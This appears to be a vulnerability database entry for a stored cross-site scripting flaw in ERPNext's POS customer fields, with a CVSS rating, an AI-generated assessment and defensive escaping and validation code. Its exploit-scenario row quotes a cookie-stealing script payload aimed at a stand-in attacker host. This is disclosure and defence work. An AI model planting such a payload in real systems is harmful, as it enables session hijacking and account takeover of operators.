Severity by source
Primary rating from NVD (the only source for this CVE). CVSS 4.0 vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Description (source: CVE.org)
An authenticated user can persist arbitrary HTML/JavaScript in the email_id or mobile_no fields of a Customer record and trigger unescaped rendering in the Point of Sale (POS) interface for every operator who selects that customer. This issue affects ERPNext: 16.16.0.
Analysis (AI-generated)
Stored cross-site scripting in ERPNext 16.16.0 allows authenticated users to inject arbitrary HTML and JavaScript into the email_id or mobile_no fields of Customer records, which execute silently in the browser of every Point of Sale (POS) operator who subsequently selects the poisoned customer. Because the payload persists in the database, a single injection event affects all future POS operator sessions that encounter that customer - creating a multiplier effect without requiring repeated attacker access. …
Vulnerability Assessment (AI-generated)
| Aspect | Assessment |
| --- | --- |
| Exploitation | Exploitation requires an authenticated ERPNext account with write access to Customer records, specifically permission to modify the email_id or mobile_no fields (consistent with PR:L in the CVSS 4.0 vector). … |
| Risk Assessment | The CVSS 4.0 score of 5.1 (Medium) accurately reflects a constrained but realistic threat: the attack is network-accessible (AV:N) and low complexity (AC:L), requires no special attack conditions (AT:N), but does demand a low-privileged authenticated account (PR:L) and passive user interaction from a POS operator (UI:P). … |
| Exploit Scenario | An authenticated ERPNext user with Customer record edit access, such as a sales clerk, data entry operator, or compromised low-privilege account, saves a payload such as `<script>fetch('https://attacker.example/c?s='+document.cookie)</script>` into the email_id field of a frequently used customer record. The next time any POS operator opens the POS interface and selects that customer to process a transaction, the script silently exfiltrates the operator's session cookie to an attacker-controlled endpoint, enabling session hijacking and unauthorized access to POS and ERPNext functions under the operator's identity. … |
| Remediation | The primary remediation is to upgrade ERPNext beyond version 16.16.0 once a patched release is published by Frappe Technologies; as of this analysis, no specific fixed version has been confirmed. The upstream repository at https://github.com/frappe/erpnext and the Fluid Attacks advisory at https://fluidattacks.com/es/advisories/weeknd should be monitored for patch availability and associated release notes. … |
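A defender-side illustration of the rendering flaw described above and of its fix, added here as an example and not taken from ERPNext's code: a POS customer card built by interpolating the raw email_id and mobile_no values into HTML, beside the same card with the values escaped, plus a store-time check that keeps markup out of those fields. The card markup, function names and the sample record are assumptions.

```javascript
// Added example (not ERPNext code). Field names email_id / mobile_no come from the
// advisory; the card markup, function names and sample record are assumptions.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can open a tag or break out of an attribute value.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: untrusted record fields concatenated straight into markup,
// so whatever was saved in the Customer record becomes part of the POS page.
function renderCustomerCardUnsafe(customer) {
  return `<div class="customer-card">` +
    `<span class="name">${customer.customer_name}</span>` +
    `<span class="email">${customer.email_id}</span>` +
    `<span class="mobile">${customer.mobile_no}</span></div>`;
}

// Hardened pattern: every field is escaped at the point it is placed into HTML.
function renderCustomerCardSafe(customer) {
  return `<div class="customer-card">` +
    `<span class="name">${escapeHtml(customer.customer_name)}</span>` +
    `<span class="email">${escapeHtml(customer.email_id)}</span>` +
    `<span class="mobile">${escapeHtml(customer.mobile_no)}</span></div>`;
}

// Defence in depth (assumed policy): reject values that cannot be a phone number or
// e-mail address before they are stored, so markup never reaches the database.
// Returns the names of the fields that fail validation.
function validateContactFields(customer) {
  const errors = [];
  if (customer.mobile_no && !/^\+?[0-9 ()-]{3,20}$/.test(customer.mobile_no)) errors.push('mobile_no');
  if (customer.email_id && !/^[^\s<>"'@]+@[^\s<>"'@]+\.[^\s<>"'@]+$/.test(customer.email_id)) errors.push('email_id');
  return errors;
}

// Constructed sample record: markup in both contact fields (a harmless probe, not an exploit).
const SAMPLE_CUSTOMER = {
  customer_name: 'Walk-in',
  email_id: '<img src=x onerror="alert(1)">',
  mobile_no: '<b>555-0100</b>',
};
```

With the sample record, the unsafe card contains a live `<img>` tag while the safe card contains only `&lt;img ...&gt;` text, and the validator flags both fields before the record is saved.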
Related advisories
- EUVD-2026-34157
- GHSA-w2pq-xvqr-7fqw